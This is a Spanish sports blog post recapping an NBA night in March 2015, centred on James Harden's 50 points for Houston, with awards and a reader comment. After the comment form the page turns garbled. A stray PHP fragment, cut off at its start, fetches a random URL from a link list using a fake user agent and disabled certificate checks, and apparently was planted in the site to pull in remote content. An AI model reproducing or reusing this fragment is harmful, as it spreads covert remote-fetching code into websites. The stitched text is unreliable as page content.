La Crónica: Harden al rescate

20 de March de 2015 por MagicJohnson32

Como si la NBA supiese que ibais a estar más atentos del March Madness que de los encuentros disputados anoche, reconozcamos de partida que la jornada fue bastante gris. En dos de los cuatro partidos ningún equipo pasó de 80 puntos y en otro jugaban los dos peores de la liga. Por fortuna, nos quedaba James Harden para rescatar la madrugada.

Os lo contamos.

harden

Denver Nuggets 108 – Houston Rockets 118

Era una ocasión especial en Houston. La franquicia celebraba el 20º aniversario de su back to back, los títulos obtenidos en 1994 y 1995 con Tomjanovich al mando y Hakeen Olawujon dando lecciones de baile a los pívots rivales. Tal vez por ello, James Harden, que venía de una serie de actuaciones bastante flojas especialmente en comparación con su propio estándar, decidió que fuese una noche para recordar. Ayudó que enfrente estaban estos Nuggets de nuevo cuño bajo la batuta de Melvin Hunt, que no se hundieron pese a verse 17 abajo al final del tercer cuarto y obligaron a McHale a devolver a Harden a pista. Eso dio a The Beard la oportunidad de redondear su actuación y alcanzar los 50 puntos con un espectacular triple ya en el último minuto del partido. La máxima anotación en la carrera de Harden sirve como reivindicación de su candidatura al MVP y supone el primer +50 de un Rocket desde que Olajuwon le hiciese 51 a los Celtics en 1996. Houston se sitúa únicamente a un partido de la segunda posición del Oeste que ocupan los Memphis Grizzlies.

Resto de la jornada

El duelo verdaderamente importante de la jornada lo disputaban Pelicans y Suns, pero fue tan malo el partido que nos negamos a dedicarle más de un par de líneas. Sólo necesitáis saber que Anthony Davis fue baja y así se explica que ganaran los Suns (72-74) pese al 3 de 26 en tiros que sumaron entre Bledsoe y Marcus Morris, y que con su victoria Phoenix recupera posibilidades de cara a Playoffs. Otro duelo directo, aunque en este caso por el peor balance de la liga (es decir, por el pick #1 del draft), lo disputaron Wolves y Knicks en el Madison. Tras una prórroga, se llevaron el partido los Wolves (95-92), así que en términos de tanking podemos decir que los ganadores fueron los neoyorquinos. Metidos de lleno en esa pelea por posicionarse de cara al draft están los Lakers, derrotados anoche por los Jazz (80-73) de un excelente Hayward.

PREMIOS

MVP: No hay alternativa. El premio es para James Harden por sus 50 puntos, 10 rebotes y 4 asistencias. Pero no se ha quedado lejos de merecer honores de MVP el senegalés Gorgui Dieng, realmente dominante en el Madison con 19 puntos (9 de 10 en tiros de campo), 11 rebotes, 6 tapones y 2 recuperaciones.

Rookie: En ausencia de Ricky Rubio, balones a Zach LaVine. El campeón del concurso de mates se ha ido entonando  y anoche fue el mejor novato con 20 puntos, 7 rebotes, 4 asistencias.

Sorpresa: Hasta ahora era casi una incógnita el rendimiento que tendría Brandan Wright como titular. Empieza a demostrar los mejores presagios y anoche se marcó 16 puntos con 8 de 10 en tiros, 8 rebotes y 6 tapones.

Decepción: Hubo muchas actuaciones pobres en la jornada. Destacamos la de Eric Bledsoe, que no contribuyó precisamente a la fundamental victoria de los Suns con su 2 de 15 en tiros de campo.

Mayor esfuerzo en vano: Cayeron los Knicks pese a que Shved sigue firmando actuaciones muy completas. Anoche  además se le unió su compañero en el backcourt titular, Langston Galloway, y entre ambos aportaron 41 puntos, 12 rebotes, 9 asistencias y 3 robos.

TOP 5

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. Ruxixón dice:
    #1

    Bueno,si tenéis la app de la NBA lo habréis visto: Durant fuera de manera indefinida,nada de baloncesto.En cristiano no juega más esta temporada por la maldita lesión del pie.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>